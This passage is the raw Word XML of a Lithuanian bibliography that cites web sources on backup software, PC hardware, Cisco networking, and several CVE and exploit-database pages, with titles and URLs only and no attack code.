      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId291" w:history="1">
        <w:r w:rsidR="006F021B" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://askme4tech.com/acronis-true-image-2020-review-tutorial</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E4C3B74"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Acronis True Image 2021. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId292">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.acronis.com/en-eu/homecomputing/thanks/acronis-true-image-2021/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D91AC55"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Acronis True Image 2021: how to back up entire computer. (2020, gruodžio 11). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId293">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://kb.acronis.com/content/65468</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="288CEE88"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AMD Processors for Desktops. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId294">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.amd.com/en/products/processors-desktop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41A78CFB" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup and Restore in Windows 10. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId295">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53D84E27"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Barr, M. (2019, birželio 13). Why your PC is so slow... and how you can speed it up. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CCleaner.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId296" w:anchor=":~:text=Your%20operating%20system%20has%20to,that%20are%20running%20on%20it.&amp;text=Too%20many%20background%20programs,on%20Windows%20or%20driver%20updates">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.ccleaner.com/knowledge/why-your-pc-is-so-slow-and-how-you-can-speed-it-up#:~:text=Your%20operating%20system%20has%20to,that%20are%20running%20on%20it.&amp;text=Too%20many%20background%20programs,on%20Windows%20or%20driver%20updates oo%20many%20background%20programs,on%20Windows%20or%20driver%20updates</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C3B0742"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Best backup option. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CentOS The Community ENTerprise Operating System.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: https://forums.centos.org/viewtopic.php?t=61787</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9247B0"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cybersecurity and Infrastructure Security Agency (CISA).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId297">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://us-cert.cisa.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59D52D89"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Cisco. Products, Solutions, and Services. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId298">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cisco.com/c/en/us/products/routers/product-listing.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6240D1AF"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures. CVE Records are used in numerous cybersecurity products and services.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId299">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BB91C82"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Configure Incident Management in Service Manager. (2016, spalio 12). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId300">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3787A3AF"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Configure VTP Server and Client in Switch. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId301">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/configure-vtp-server-and-client-in-switch.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="699F3F2C"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Configuring Router and Switch Devices </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://www.cisco.com/c/en/us/td/docs/security/security_management/cs-mars/4-3/user/guide/local_controller/cfgrtrsw.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D476995"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CorelDRAW Graphics Suite X8: System Requirements. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId302">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://support.corel.com/hc/en-us/articles/219326157-CorelDRAW-Graphics-Suite-X8-System-Requirements</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57AA3080"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVE-2004-2687. Common Vulnerabilities and Exposures.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId303">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37138142"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CVE-2007-2447.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId304">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.samba.org/samba/security/CVE-2007-2447.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="025283E4"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2009-1185.c. Expoit Database. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId305">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/download/8572</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="329A7D2C"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DaVinci Resolve System Requirements &amp; Recommended Hardware. (2020, vasario 3). </w:t>
      </w:r>
      <w:hyperlink r:id="rId306">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">DaVinci </w:t>
        </w:r>
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>Resolve</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId307">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://motionarray.com/learn/davinci-resolve/davinci-resolve-system-requirements/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BC0D56E"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DDR, DDR2, and DDR3 Memory for Intel® Desktop Boards. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://www.intel.com/content/www/us/en/support/articles/000005843/boards-and-kits/desktop-boards.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC8C2A3"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DDR1, DDR2, DDR3, and DDR4 RAM memory: What are their differences? (2020, spalio 6). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">TechLog360. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId308">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://techlog360.com/ddr1-ddr2-ddr3-ddr4-ram-differences/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33DFD3C9" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Diagrams.net. Open source technology stack for building diagramming applications.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId309">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://app.diagrams.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CCCA76E"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DistCC Daemon Command Execution. (2018, gegužės 30). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Rapid7 Vulnerability &amp; Exploit Database</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId310">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="423FDF88"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Download VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VirtualBox.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId311">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.virtualbox.org/wiki/Downloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="276F4391"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Dropbox.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId312">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.dropbox.com/terms2014</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="727FDF60"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Ekahau HeatMapper download. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">FDMlib. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId313">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://en.freedownloadmanager.org/Windows-PC/Ekahau-HeatMapper-FREE.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EA94D94"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Evans, C. (2011, liepos 3). Alert: vsftpd download backdoored. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Scarybeastsecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId314">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3011E93A"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 xml:space="preserve">Facebook. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId315">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.facebook.com/policies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A2D3455"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Fisher, T. (2020, gruodžio 2). How to Fix a Computer That Won't Turn On. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LifeWire. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId316">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.lifewire.com/how-to-fix-a-computer-that-wont-turn-on-2624450</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="733D67AF"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Get reliable WiFi at home without needing to be a WiFi expert. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metageek. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId317">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.metageek.com/products/rampart-home/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15BF975E"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Glawion, A. (2021, sausio 9). Best Workstation Computer for 3D Modeling and Rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. CGdirector.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId318">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cgdirector.com/best-computer-3d-modeling-rendering/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="721EAF1D"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Global threat activity. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId319">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/wdsi/threats</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E30CDB2"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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Guoan, X. (2018, gruodžio 6). Install NextCloud on CentOS 8/RHEL 8 with Nginx (LEMP Stack). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
